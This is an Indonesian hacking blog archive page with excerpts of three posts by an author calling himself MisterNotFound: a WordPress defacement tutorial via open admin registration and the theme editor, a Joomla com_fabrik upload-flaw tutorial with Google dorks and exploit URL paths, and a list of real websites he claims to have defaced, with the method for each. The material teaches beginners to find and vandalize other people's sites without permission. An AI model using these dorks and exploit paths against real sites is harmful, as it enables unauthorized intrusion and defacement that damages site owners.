Posts

Showing posts from March, 2015

Deface Teknik WP Add Admin Vulnerability

Image
Assalamualaikum sobat NOT_FOUND yang berbahagia :) (DI REVISI) Pagi yang mendung ini, saya mau ngasih tutor nih. Merubah halaman depan website dengan teknik WP-Login + Login as Admin. Perlu di perhatikan masbro, teknik ini hanya bisa dilakukan jika website tersebut menggunakan CMS Wordpress.  Sekedar info, bahwa teknik ini memanfaatkan plugin kerentanan Add admin/Register New Admin  pada direktori  wp-login.php?action=register Kelebihan tutor saya kali ini yaitu bisa menebas index (halaman awal website) tanpa harus pake Shell :) Sebenarnya ini teknik lama, tapi karena jarang di publish dan jarang banget ditemukan di google, akhirnya saya publish artikel ini dengan senang hati :v Ok, langsung caw sobat ;) Shortcut :   Click Here for Tutorial on Youtube 1. DORK UMUM: inurl:/wp-login DORK KEMBANGAN SAYA : Inurl: /wp-login.php?action=register Inurl:/register-2/ 2. Exploit : wp-admin/theme-editor.php 3. POC : - Pergi ke mbah google, lalu masukkan dork tersebut ke dal...
Post a Comment
Read more

Deface Teknik Com_Fabric

Image
Assalamualaikum sobat Not_Found :) Pada kesempatan yang boring ini saya tulis beberapa tutor yang sebenarnya udah agak usang. Yaitu deface website teknik Com_fabric. Teknik ini memanfaatkan celah upload file pada direktori com_fabric pada CMS Joomla . Teknik ini juga sering menjadi santapan lezat bagi para newbie yang baru belajar deface :) Langsung aja yok ke TKP :) 1. DORK : - Inurl:viewTable?cid= site:com  - Inurl:index.php?option=com_fabrik 2. EXPLOIT UMUM: - index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 DAN DIBAWAH INI MERUPAKAN EXPLOIT TAMBAHAN YANG SAYA KEMBANGIN : - index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher - index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=0 - index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=23 3. POC : - Masukan dork diatas kedalam kotak penelusuran google. Atau bisa langsung caw K...
Post a Comment
Read more

Daftar Situs Yang Saya Deface

Assalamualaikum, sobat haxor. Meet again with me,  _MisterNotFound_ Sorri nih, dah lama gak publish :) Berhubung mirror selalu keduluan, saya mau show-off aja deh. Anggap aja ini publish spam :v Tapi kalo sampeyan memperhatikan baik-baik , sampeyan bisa belajar dari apa yang saya 'show-off'-in ini :) Sebelumnya, maaf saya masih newbie, mohon para mastah untuk bisa mengerti saya :* :v Ini beberapa situs yang telah saya deface beserta POC (Teknik Deface) nya : 1.  http://www.pujaashreegreenpower.com/ POC : Bypass SQL Login 2.  http://gasthof-lammer.com/components/com_sexycontactform/fileupload/files/MisterNotFound.html POC : Com_Sexy 3.  http://www.max-immo.cz/components/com_sexycontactform/fileupload/files/MisterNotFound.html POC : Com_Sexy 4.  http://caspianpetro.com/components/com_sexycontactform/fileupload/files/MisterNotFound.html POC : Com_Sexy 5.  http://www.peercore.com.au/components/com_sexycontactform/fileupload/files/MisterNotFound.html POC : Com_S...
Post a Comment
Read more